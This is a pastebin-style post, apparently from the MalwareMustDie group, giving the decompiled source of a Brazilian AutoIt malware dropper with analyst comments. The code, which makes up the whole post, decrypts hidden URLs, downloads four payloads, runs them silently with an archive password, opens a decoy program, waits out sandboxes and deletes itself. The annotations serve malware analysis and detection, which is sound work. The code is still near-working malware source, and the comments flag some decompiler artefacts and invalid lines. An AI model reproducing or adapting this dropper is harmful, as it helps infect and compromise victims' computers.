Brazil AutoIt Malware - Dropper & Shellexec's

MalwareMustDie Jan 29th, 2016 (edited) 541 Never
  1. // Brazil AutoIt Malware - Dropper & Shellexec
  2. // #MalwareMustDie
  3.  
; ---------------------------------------------------------------------------
; Analyst notes (decompiled AutoIt dropper). Top-level setup:
;   1. hide the tray icon,
;   2. enforce single-instance through a named mutex,
;   3. idle for ~25 seconds before touching disk or network,
;   4. define the AES passwords and the hex ciphertext blobs that the rest of
;      the script decrypts with strcrpt() to obtain URLs, paths and arguments.
; None of the ciphertext is decrypted in this listing, so every statement
; below about "what a blob decrypts to" is inferred from how the value is
; used and is marked as such.
; ---------------------------------------------------------------------------
Opt("TrayIconHide", 1)
Global $hmutex                      ; DllCall() result array from CreateMutexA, see createmutex()
Local $closehandle
; Single-instance guard. Note the mutex name is reused verbatim as the AES
; password $key further down, so it doubles as a decryption key and an IOC.
If createmutex("1iu1gx6wtf8XX8Qgs23WglF7pHVE7", $hmutex) Then
    Sleep(0)
Else
    ; Another instance already owns the mutex: drop our handle and quit.
    $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
    onautoitexit()
    Exit
EndIf
; Poll every 250 ms until ~25 s have elapsed before doing anything else.
; Likely intended to outlast short automated-analysis runs (inferred).
$init = TimerInit()
While 1
    Sleep(250)
    $diff = TimerDiff($init)
    If $diff / 1000 >= 25 Then
        Sleep(0)
        ExitLoop
    EndIf
WEnd
; Decryption material. Each hex string is passed to strcrpt(False, "0x" & hex, pw)
; i.e. AES-256 ciphertext; pw is $key for URLs/paths and $s121 for the
; command-line fragments in $str1[].
Local $key = "1iu1gx6wtf8XX8Qgs23WglF7pHVE7"     ; AES password #1 (same string as the mutex name)
Local $lk = "334865BC36520346E0C1E1E80E851C9C85E28EAFDF2ED9C435EE1DB8659FB331"    ; -> download URL prefix (prepended to $array[0..3] in every dow() call)
Local $fk = "7F526C99C294202AAD308A719AE29C93ABC72DC4A3DACE0C5A5AA8B2C5F69F37BE5684BEABE0EC9D6C66552570142913"    ; -> path of the program launched visibly (@SW_SHOW) before the downloads start
Local $pass = "102030as"    ; only plaintext secret; spliced into both sh() command lines after $str1[3] - consistent with an archive password, unconfirmed
Local $s121 = "V0jB3Lk1S0ohgZYQrMl4pj"    ; AES password #2, used exclusively for the $str1[] fragments
Local $vrtmp = ""    ; later set to the directory of the 2nd download ($base[1])
Dim $base[4]         ; full local paths of the four downloads, filled by dow() (index = 4th arg)
Dim $array[7]        ; [0..3] URL suffixes, [5]/[6] directory names, [4] the only plaintext entry
$array[0] = "DD5AA5D0CC90E3A5093C88EE117132A1"
$array[1] = "BCDA98C9F0011641ABD2BF11F2AC4587"
$array[2] = "1F2F3D08ADA1FB0214BE2862C3ADE4AD"
$array[3] = "AF94BB46CE3C9472E13AA925608FC37F"
$array[4] = " *.mp4"    ; plaintext; appended to the second sh() command line (wildcard argument)
$array[5] = "21CF70074AE1586E22D93C743A4CF40E"    ; -> directory name created under the system drive root
$array[6] = "93BE9C9A468F5C4543C1ED8CAB332A5FE3C001E933669C7D4BD959A2196637CC"    ; -> directory name created under %APPDATA%
Dim $fl[2]
$fl[0] = "1DC242A0B18F861AD153F4903CB6403A"    ; -> file name expected in $vrtmp after the first sh() run; executed if present
$fl[1] = "ACC16D423118CEA4717FA852B1EA3E3C"    ; -> fixed file name of the 3rd download in %TEMP% (never deleted, see end of script)
Dim $str1[7]    ; ciphertext command-line fragments, assigned further down
  42.  
; Create (and take initial ownership of) a named mutex via CreateMutexA.
; $mutex  - mutex name (here also the AES password $key)
; $hmutex - ByRef; receives the DllCall() result array, $hmutex[0] = handle
; Returns 1 if this process created the mutex, 0 if it already existed
; (ERROR_ALREADY_EXISTS = 183), in which case the handle is closed again.
; NOTE(review): the existence test relies on a separate DllCall to
; GetLastError; if AutoIt issues any Win32 call in between the value may be
; stale - the check is best-effort, not authoritative.
Func createmutex($mutex, ByRef $hmutex)
    Dim $error_already_exists = 183
    Dim $lasterror, $closehandle
    Dim $retval
    ; CreateMutexA(lpMutexAttributes = NULL, bInitialOwner = TRUE, lpName)
    $hmutex = DllCall("kernel32.dll", "long", "CreateMutexA", "ptr", 0, "int", 1, "str", $mutex)
    $lasterror = DllCall("kernel32.dll", "long", "GetLastError")
    If $lasterror[0] = $error_already_exists Then
        $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
        $retval = 0
    Else
        $retval = 1
    EndIf
    Return $retval
EndFunc
  57.  
; Release and close the global mutex handle if createmutex() populated it.
; Despite the name, no OnAutoItExitRegister() call is visible in this
; listing; the function is only invoked explicitly from the "already
; running" branch at the top of the script.
Func onautoitexit()
    Dim $releasemutex, $closehandle
    If IsArray($hmutex) Then
        $releasemutex = DllCall("kernel32.dll", "int", "ReleaseMutex", "long", $hmutex[0])
        $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
    EndIf
EndFunc
  65.  
; Return one of three strings by selector $n:
;   1 -> decrypt($arext[0]) with $key   (a file extension, ciphertext - unknown)
;   2 -> decrypt($arext[1]) with $key   (a file extension, ciphertext - unknown)
;   3 -> the literal "0x": 1899 - 1899 evaluates to 0, then & "x" gives "0x".
; Case 3 is the obfuscated hex prefix every caller prepends to a ciphertext
; blob so that _Crypt_DecryptData receives a "0x..." binary literal; cases
; 1 and 2 call ext(3) recursively for the same purpose.
; Any other $n falls through the Select and returns nothing.
Func ext($n)
    Dim $nm
    Dim $arext[3]
    $arext[0] = "C05D7B097FE50E38BEBADAD08D7C6E9A"
    $arext[1] = "AFCFA0ADFA04EA6120BFAEB086014AE9"
    $arext[2] = 1899 - 1899 & "x"    ; == "0x"
    Select
        Case $n = 1
            $nm = strcrpt(False, ext(3) & $arext[0], $key)
            Return $nm
        Case $n = 2
            $nm = strcrpt(False, ext(3) & $arext[1], $key)
            Return $nm
        Case $n = 3
            $nm = $arext[2]
            Return $nm
    EndSelect
EndFunc
  84.  
; Build a random file/directory name of lowercase letters.
; $v    - 1: append the extension returned by ext($nmex); anything else: bare name
; $nmex - selector passed to ext(); ignored unless $v = 1
; $qtd  - the loop runs 0..$qtd inclusive, so the name has $qtd + 1 letters
; Returns the generated name. Callers pass Random(5, 10) etc. as $qtd, so
; names are 6-11 letters long; combined with the random directory names this
; makes file-path IOCs unstable - detect on behaviour rather than names.
; NOTE(review): Random()'s third argument is 6 here; the documented flag for
; an integer result is 1. Chr() receives the value either way - verify the
; effective behaviour in the targeted AutoIt version if it matters.
Func nmfl($v, $nmex, $qtd)
    Dim $name
    Dim $ext
    For $i = 0 To $qtd
        $name = $name & Chr(Random(Asc("a"), Asc("z"), 6))
    Next
    If $v = 1 Then
        $ext = ext($nmex)
        Return $name & $ext
    Else
        Return $name
    EndIf
EndFunc
  98.  
; Download stage: fetch $lk into $dr & $fl and record the path in $base[$nm].
; $lk - full URL (decrypted prefix & suffix, built by the caller)
; $dr - destination directory, created if missing
; $fl - destination file name
; $nm - slot in the global $base[] array that receives the full path
; The InetGet() return value is not checked and the file is not verified in
; any way (no size/hash check); a failed download simply leaves the path in
; $base[] pointing at a non-existent file, which the later sh()/FileExists
; checks silently tolerate. Existing files are never re-downloaded.
Func dow($lk, $dr, $fl, $nm)
    $base[$nm] = $dr & $fl
    DirCreate($dr)
    If NOT FileExists($dr & $fl) Then
        InetGet($lk, $dr & $fl)
    EndIf
EndFunc
  106.  
; Execute $infl with command line $prm in a hidden window (@SW_HIDE) if the
; file exists; otherwise do nothing. Used to run the first download with
; decrypted arguments referencing the other downloads and $pass.
Func sh($infl, $prm)
    If FileExists($infl) Then
        ShellExecute($infl, $prm, "", "open", @SW_HIDE)
    EndIf
EndFunc
  112.  
; Return the directory part of a Windows path by stripping the last
; backslash-delimited component ("\\[^\\]*$" - AutoIt strings have no escape
; sequences, so PCRE sees a literal backslash followed by non-backslashes
; to end of string). Non-string input sets @error = 1 and returns -1.
Func gtdir($sfilepath)
    If NOT IsString($sfilepath) Then
        Return SetError(1, 0, -1)
    EndIf
    Local $filedir = StringRegExpReplace($sfilepath, "\\[^\\]*$", "")
    Return $filedir
EndFunc
  120.  
; Self-delete via a throwaway batch file: loop on "del <this exe>" until the
; file is gone (i.e. until this process has exited), then delete the batch.
; The batch is started hidden and this function does NOT Exit, so the script
; keeps running after calling un(); deletion only succeeds once it ends.
; Forensic note: @TempDir is concatenated without a path separator (compare
; the main body, which appends "\"), so if @TempDir has no trailing
; backslash the .bat lands in the PARENT of %TEMP% with the temp folder's
; name as a prefix, e.g. ...\Local\Temp<9 random letters>.bat - confirm on a
; detonation, as the 9-letter name comes from nmfl(0, 0, 8).
Func un()
    Local $srbt = @TempDir & nmfl(0, 0, 8) & ".bat"
    Local $hrbt = FileOpen($srbt, 2)    ; mode 2 = overwrite
    FileWrite($hrbt, ":start" & @CRLF & 'del "' & @AutoItExe & '"' & @CRLF & 'IF EXIST "' & @AutoItExe & '" goto start' & @CRLF & 'del "' & $srbt & '"')
    FileClose($hrbt)
    Run($srbt, "", @SW_HIDE)
EndFunc
  128.  
; AES-256 wrapper around the AutoIt Crypt UDF (_Crypt_* / $CALG_AES_256;
; the #include is not present in this decompiled listing).
; $bencrypt  - True: return _Crypt_EncryptData($sdata, $spassword) as binary
;              False: decrypt $sdata and return it as a string
; $sdata     - for decryption a "0x<hex>" binary literal (callers build it
;              with ext(3) & <hex blob>)
; $spassword - $key or $s121; the UDF derives the AES key from this string
; Every call site in this script passes False, so the encrypt path is dead
; code here - presumably used by the builder that produced the blobs.
; _crypt_startup()/_crypt_shutdown() are paired around each call.
Func strcrpt($bencrypt, $sdata, $spassword)
    _crypt_startup()
    Local $sreturn = ""
    If $bencrypt Then
        $sreturn = _crypt_encryptdata($sdata, $spassword, $calg_aes_256)
    Else
        $sreturn = BinaryToString(_crypt_decryptdata($sdata, $spassword, $calg_aes_256))
    EndIf
    _crypt_shutdown()
    Return $sreturn
EndFunc
  140.  
; ---------------------------------------------------------------------------
; Main sequence. Order of operations as written:
;   a. launch decrypt($fk) VISIBLY with decrypt($str1[6]) as arguments
;   b. download #1 -> %TEMP%\<random>.<ext(1)>              ($base[0], the "tool")
;      download #2 -> <SysDrive>:\<dir>\<random>\<random>   ($base[1])
;   c. run $base[0] hidden with a command line that names $base[1], $pass
;      and the directory of $base[1] - consistent with extracting a
;      password-protected archive (inferred; fragments are ciphertext)
;   d. if decrypt($fl[0]) now exists in that directory, execute it;
;      otherwise schedule self-deletion (but keep running)
;   e. download #3 -> %TEMP%\decrypt($fl[1])                ($base[2])
;      download #4 -> %APPDATA%\<dir>\<random>              ($base[3])
;   f. run $base[0] hidden again against $base[3], $pass, the %APPDATA% dir
;      and the plaintext " *.mp4" argument
;   g. delete $base[0], $base[1], $base[3] and self-delete. $base[2] is NOT
;      deleted and is a persistent artefact worth collecting.
; ---------------------------------------------------------------------------
strcrpt    ; bare identifier - almost certainly a decompiler artefact, not a call
; The trailing `;"` on the next line is a comment (';' starts comments in AutoIt)
$tmp = @TempDir & "\" ;"
; NOTE(review): `:"` below is not valid AutoIt; most likely a mangled `;"` as on
; the previous line, i.e. also a decompilation/paste artefact. Left as found.
$drmd = @AppDataDir & "\" :"
$drcp = StringMid(@WindowsDir, 1, 2) & "\"    ; drive letter of the Windows install, e.g. "C:\"
; Command-line fragments (AES ciphertext, decrypted with $s121 at use).
$str1[0] = "A407B24B41A4AEA6C7DE8D84838569E8"    ; first-run prefix, precedes $base[1]
$str1[1] = "35088C13149E3DAF5ED9EE207437B6F7"    ; second-run prefix, precedes $base[3]
$str1[2] = "5F675C8B3973DD8C854DEDA25DB0F213"    ; follows the input path in both runs
$str1[3] = "06F84E0A3F617F500F43A1661398D5DA"    ; immediately precedes $pass in both runs
$str1[4] = "8956BA696DC2C905DA982296B1AD83C5"    ; trailing argument of the second run
$str1[5] = "72DCE8B08F9EA9962B798A98251FDA8D"    ; precedes the output directory in both runs
$str1[6] = "A0A960A1A6B5E25944CD3510DF58C38F"    ; arguments for the visible launch of decrypt($fk)
; (a) visible launch - the only @SW_SHOW in the script; presumably a decoy/lure
ShellExecute(strcrpt(False, ext(3) & $fk, $key), "", "", strcrpt(False, ext(3) & $str1[6], $s121), @SW_SHOW)
; (b) downloads #1 and #2
dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[0], $key), $tmp, nmfl(1, 1, Random(5, 10)), 0)
dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[1], $key), $drcp & strcrpt(False, ext(3) & $array[5], $key) & nmfl(0, 2, Random(3, 5)) & "\", nmfl(0, 2, Random(5, 10)), 1)
Sleep(5000)
$vrtmp = gtdir($base[1]) & "\"    ; directory that holds download #2
; (c) tool run #1: <str1[0]><base[1]><str1[2]><str1[3]><pass><str1[5]><vrtmp>
sh($base[0], strcrpt(False, ext(3) & $str1[0], $s121) & $base[1] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $vrtmp)
Sleep(10000)
; (d) execute the file that run #1 was expected to produce, else self-delete
If FileExists($vrtmp & strcrpt(False, ext(3) & $fl[0], $key)) Then
    ShellExecute($vrtmp & strcrpt(False, ext(3) & $fl[0], $key))
Else
    un()    ; no Exit follows; the script carries on with stage (e)
EndIf
; (e) downloads #3 and #4
dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[2], $key), $tmp, strcrpt(False, ext(3) & $fl[1], $key), 2)
dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[3], $key), $drmd & strcrpt(False, ext(3) & $array[6], $key), nmfl(0, 2, Random(5, 10)), 3)
Sleep(5000)
; (f) tool run #2: <str1[1]><base[3]><str1[2]><str1[3]><pass><str1[5]><%APPDATA%\dir> *.mp4<str1[4]>
sh($base[0], strcrpt(False, ext(3) & $str1[1], $s121) & $base[3] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $drmd & strcrpt(False, ext(3) & $array[6], $key) & $array[4] & strcrpt(False, ext(3) & $str1[4], $s121))
Sleep(20000)
; (g) cleanup: spin until the tool is deletable (it may still be running), then remove the rest
While FileExists($base[0])
    FileDelete($base[0])
WEnd
FileDelete($base[1])
FileDelete($base[3])    ; $base[2] (%TEMP%\decrypt($fl[1])) is intentionally or accidentally left behind
un()